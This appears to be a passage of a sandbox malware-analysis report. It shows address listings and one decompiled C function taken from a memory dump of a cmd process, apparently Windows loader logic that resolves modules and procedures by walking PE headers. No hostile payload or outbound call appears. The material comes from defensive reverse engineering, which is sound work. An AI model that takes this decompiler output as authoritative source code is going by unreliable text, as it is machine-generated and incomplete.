                                                                                                                                          0x03bd0ed3
                                                                                                                                          0x03bd0edb
                                                                                                                                          0x03c2ea2d
                                                                                                                                          0x03c2ea2f
                                                                                                                                          0x03c2ea31
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2ea37
                                                                                                                                          0x03c2ea37
                                                                                                                                          0x03c2ea3a
                                                                                                                                          0x03c2ea3e
                                                                                                                                          0x03c2ea47
                                                                                                                                          0x03c2ea4a
                                                                                                                                          0x03c2ea4c
                                                                                                                                          0x03c2ea4d
                                                                                                                                          0x03c2ea4d
                                                                                                                                          0x03c2ea4e
                                                                                                                                          0x03c2ea4e
                                                                                                                                          0x03c2ea51
                                                                                                                                          0x03c2ea52
                                                                                                                                          0x03c2ea52
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0ee1
                                                                                                                                          0x03bd0ee1
                                                                                                                                          0x03bd0ee1
                                                                                                                                          0x03bd0ee3
                                                                                                                                          0x03bd0ee3
                                                                                                                                          0x03bd0ee6
                                                                                                                                          0x03bd0eec
                                                                                                                                          0x03c2ea5b
                                                                                                                                          0x03c2ea5d
                                                                                                                                          0x03bd0ef6
                                                                                                                                          0x03bd0ef8
                                                                                                                                          0x03c2ea6f
                                                                                                                                          0x03c2ea6f
                                                                                                                                          0x03bd0efe
                                                                                                                                          0x03bd0efe
                                                                                                                                          0x03bd0f03
                                                                                                                                          0x03c2ea7b
                                                                                                                                          0x03c2ea7d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2ea83
                                                                                                                                          0x03c2ea85
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2ea8b
                                                                                                                                          0x03c2ea91
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2ea97
                                                                                                                                          0x03c2ea9a
                                                                                                                                          0x03c2eaa0
                                                                                                                                          0x03c2eaa2
                                                                                                                                          0x03c2eaa2
                                                                                                                                          0x03c2eaae
                                                                                                                                          0x03c2eab3
                                                                                                                                          0x03c2eab6
                                                                                                                                          0x03c2eabf
                                                                                                                                          0x03c2eaca
                                                                                                                                          0x03c2eacd
                                                                                                                                          0x03c2ead1
                                                                                                                                          0x03c2ead1
                                                                                                                                          0x03c2eab8
                                                                                                                                          0x03c2eab8
                                                                                                                                          0x03c2eab8
                                                                                                                                          0x03c2ead2
                                                                                                                                          0x03c2ead9
                                                                                                                                          0x03bd0f0e
                                                                                                                                          0x03bd0f15
                                                                                                                                          0x03bd0f17
                                                                                                                                          0x03bd0f17
                                                                                                                                          0x03bd0f1e
                                                                                                                                          0x03bd0f23
                                                                                                                                          0x03c2eae1
                                                                                                                                          0x03c2eae1
                                                                                                                                          0x03bd0f38
                                                                                                                                          0x03bd0f3a
                                                                                                                                          0x03bd0f3a
                                                                                                                                          0x03bd0f49
                                                                                                                                          0x03bd1108
                                                                                                                                          0x03bd1108
                                                                                                                                          0x03bd0f5b
                                                                                                                                          0x03bd10c7
                                                                                                                                          0x03bd10ca
                                                                                                                                          0x03bd10cc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd10dc
                                                                                                                                          0x03bd10de
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0f61
                                                                                                                                          0x03bd0f61
                                                                                                                                          0x03bd0f61
                                                                                                                                          0x03bd0f67
                                                                                                                                          0x03bd0f6b
                                                                                                                                          0x03bd111d
                                                                                                                                          0x03bd111d
                                                                                                                                          0x03bd0f75
                                                                                                                                          0x03bd0f77
                                                                                                                                          0x03bd0f77
                                                                                                                                          0x03bd0f85
                                                                                                                                          0x03bd0f8b
                                                                                                                                          0x03bd10b9
                                                                                                                                          0x03bd10bc
                                                                                                                                          0x03c2eae9
                                                                                                                                          0x03c2eae9
                                                                                                                                          0x03bd0f91
                                                                                                                                          0x03bd0f91
                                                                                                                                          0x03bd0f91
                                                                                                                                          0x03bd0f96
                                                                                                                                          0x03bd0f98
                                                                                                                                          0x03bd0f9a
                                                                                                                                          0x03bd0f9a
                                                                                                                                          0x03bd0fa6
                                                                                                                                          0x03bd107c
                                                                                                                                          0x03bd107f
                                                                                                                                          0x03bd108d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd108d
                                                                                                                                          0x03bd1081
                                                                                                                                          0x03bd1087
                                                                                                                                          0x03c2eaf4
                                                                                                                                          0x03c2eafa
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2eb00
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0fac
                                                                                                                                          0x03bd0fac
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0fac
                                                                                                                                          0x03bd0fa6
                                                                                                                                          0x03bd0f5b
                                                                                                                                          0x03bd0f09
                                                                                                                                          0x03bd0f09
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0f09
                                                                                                                                          0x03c2ea63
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2ea63
                                                                                                                                          0x03bd0ef4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0ef4
                                                                                                                                          0x03bd0ebc
                                                                                                                                          0x03bd0ebc
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0ebc
                                                                                                                                          0x03bd0eb6
                                                                                                                                          0x03bd1149
                                                                                                                                          0x03bd114c
                                                                                                                                          0x03bd114d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd114d
                                                                                                                                          0x03bd0ea4
                                                                                                                                          0x03bd0ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0fb7
                                                                                                                                          0x03bd0fb7
                                                                                                                                          0x03bd0fbc
                                                                                                                                          0x03bd0fc9
                                                                                                                                          0x03bd0fc9
                                                                                                                                          0x03bd0fce
                                                                                                                                          0x03bd1020
                                                                                                                                          0x03bd1025
                                                                                                                                          0x03bd1094
                                                                                                                                          0x03bd1094
                                                                                                                                          0x03bd1099
                                                                                                                                          0x03c2ea04
                                                                                                                                          0x03c2ea04
                                                                                                                                          0x03c2ea09
                                                                                                                                          0x03c2ea1c
                                                                                                                                          0x03c2ea0b
                                                                                                                                          0x03c2ea0b
                                                                                                                                          0x03c2ea0e
                                                                                                                                          0x03c2ea14
                                                                                                                                          0x03c2ea14
                                                                                                                                          0x03c2ea0e
                                                                                                                                          0x03c2ea09
                                                                                                                                          0x03bd1027
                                                                                                                                          0x03bd1027
                                                                                                                                          0x03bd1155
                                                                                                                                          0x03bd102d
                                                                                                                                          0x03bd102d
                                                                                                                                          0x03bd102d
                                                                                                                                          0x03bd1032
                                                                                                                                          0x03c2e9fc
                                                                                                                                          0x03c2e9fc
                                                                                                                                          0x03bd1032
                                                                                                                                          0x03bd1027
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd1025
                                                                                                                                          0x03bd0fd0
                                                                                                                                          0x03c2e9f4
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2e9f4
                                                                                                                                          0x03bd0fd6
                                                                                                                                          0x03bd0fd9
                                                                                                                                          0x03bd1059
                                                                                                                                          0x03bd1059
                                                                                                                                          0x03bd105e
                                                                                                                                          0x03c2e9ec
                                                                                                                                          0x03bd1064
                                                                                                                                          0x03bd1064
                                                                                                                                          0x03bd1064
                                                                                                                                          0x03bd1069
                                                                                                                                          0x03bd10ac
                                                                                                                                          0x03bd106b
                                                                                                                                          0x03bd106b
                                                                                                                                          0x03bd106e
                                                                                                                                          0x03bd1074
                                                                                                                                          0x03bd1074
                                                                                                                                          0x03bd106e
                                                                                                                                          0x03bd1069
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd105e
                                                                                                                                          0x03bd0fdb
                                                                                                                                          0x03bd10a4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd10a4
                                                                                                                                          0x03bd0fe1
                                                                                                                                          0x03bd0fe4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0fea
                                                                                                                                          0x03bd0ff1
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0ff8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2e9e4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd1018
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd1051
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0ff1
                                                                                                                                          0x03bd0fbe
                                                                                                                                          0x03bd0fc3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0fc3
                                                                                                                                          0x03bd0df3
                                                                                                                                          0x03c2e9d5
                                                                                                                                          0x03c2e9d7
                                                                                                                                          0x03bd1128
                                                                                                                                          0x03bd1128
                                                                                                                                          0x03bd112b
                                                                                                                                          0x03bd112d
                                                                                                                                          0x03bd1133
                                                                                                                                          0x03bd1133
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd112d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c2e9d7
                                                                                                                                          0x03bd0dc2
                                                                                                                                          0x03bd10f6
                                                                                                                                          0x03bd0dd4
                                                                                                                                          0x03bd0dd7
                                                                                                                                          0x03bd0dda
                                                                                                                                          0x03bd0de8
                                                                                                                                          0x03bd0de9
                                                                                                                                          0x03bd0de9
                                                                                                                                          0x03bd0dda
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd0dc2
                                                                                                                                          0x03bd0dac
                                                                                                                                          0x03bd0dae
                                                                                                                                          0x03bd0db3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e95fd7dd596a6055a53e79330555509ab5d38f3250f2f260868fbcb3a6017bfa
                                                                                                                                          • Instruction ID: 37b111ef236d6996b2548cdb06371a2ad6460dd0547e4478fdda7cc3f1ef3bab
                                                                                                                                          • Opcode Fuzzy Hash: e95fd7dd596a6055a53e79330555509ab5d38f3250f2f260868fbcb3a6017bfa
                                                                                                                                          • Instruction Fuzzy Hash: D6D1B431E0425D8BDB68EEADC5903FDFBB5EB44308F2841B9D446EB285E7748981CB45
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BED5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                          			E03BED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x3ccd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03BE6600(0x3cc52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3cc7b9c; // 0x0
							_t281 = L03BF4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E03C1F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3cc7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x3cc7b8c; // 0x3472b40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03BF2280(_t200, 0x3cc84d8);
									_t277 =  *0x3cc85f4; // 0x3473030
									_t351 =  *0x3cc85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x3472fc8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E03BEFFB0(_t287, _t353, 0x3cc84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E03C2CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03BE6600(0x3cc52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03BE7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x3ccb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E03C5E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3cc8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x3ccb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x3ccb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03BF2280(_t250, 0x3cc84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03C13898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E03BEFFB0(_t293, _t353, 0x3cc84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E03C137F5(_t353, 0);
																}
																E03C10413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03C09B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E03C002D6(_t174);
																}
																L03BF77F0( *0x3cc7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E03C0C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L03BEEC7F(_t353);
										L03C019B8(_t287, 0, _t353, 0);
										_t200 = E03BDF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x3ccb2f8 |  *0x3ccb2fc) == 0 || ( *0x3ccb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E03C1B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x3ccb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E03C86B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E03C86AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E03BEE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L03BEEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E03C19730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E03BEE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L03BE8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03C13C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                                                                          0x03bed5f2
                                                                                                                                          0x03bed5f5
                                                                                                                                          0x03bed5f5
                                                                                                                                          0x03bed5fd
                                                                                                                                          0x03bed600
                                                                                                                                          0x03bed60a
                                                                                                                                          0x03bed60d
                                                                                                                                          0x03bed617
                                                                                                                                          0x03bed61d
                                                                                                                                          0x03bed627
                                                                                                                                          0x03bed62e
                                                                                                                                          0x03bed911
                                                                                                                                          0x03bed913
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed919
                                                                                                                                          0x03bed919
                                                                                                                                          0x03bed919
                                                                                                                                          0x03bed634
                                                                                                                                          0x03bed634
                                                                                                                                          0x03bed634
                                                                                                                                          0x03bed634
                                                                                                                                          0x03bed640
                                                                                                                                          0x03bed8bf
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed646
                                                                                                                                          0x03bed646
                                                                                                                                          0x03bed64d
                                                                                                                                          0x03bed652
                                                                                                                                          0x03c3b2fc
                                                                                                                                          0x03c3b2fc
                                                                                                                                          0x03c3b302
                                                                                                                                          0x03c3b33b
                                                                                                                                          0x03c3b341
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b304
                                                                                                                                          0x03c3b304
                                                                                                                                          0x03c3b319
                                                                                                                                          0x03c3b31e
                                                                                                                                          0x03c3b324
                                                                                                                                          0x03c3b326
                                                                                                                                          0x03c3b332
                                                                                                                                          0x03c3b347
                                                                                                                                          0x03c3b34c
                                                                                                                                          0x03c3b351
                                                                                                                                          0x03c3b35a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b328
                                                                                                                                          0x03c3b328
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b328
                                                                                                                                          0x03c3b326
                                                                                                                                          0x03bed658
                                                                                                                                          0x03bed658
                                                                                                                                          0x03bed65b
                                                                                                                                          0x03bed665
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed66b
                                                                                                                                          0x03bed66b
                                                                                                                                          0x03bed66b
                                                                                                                                          0x03bed66b
                                                                                                                                          0x03bed66d
                                                                                                                                          0x03bed672
                                                                                                                                          0x03bed67a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed680
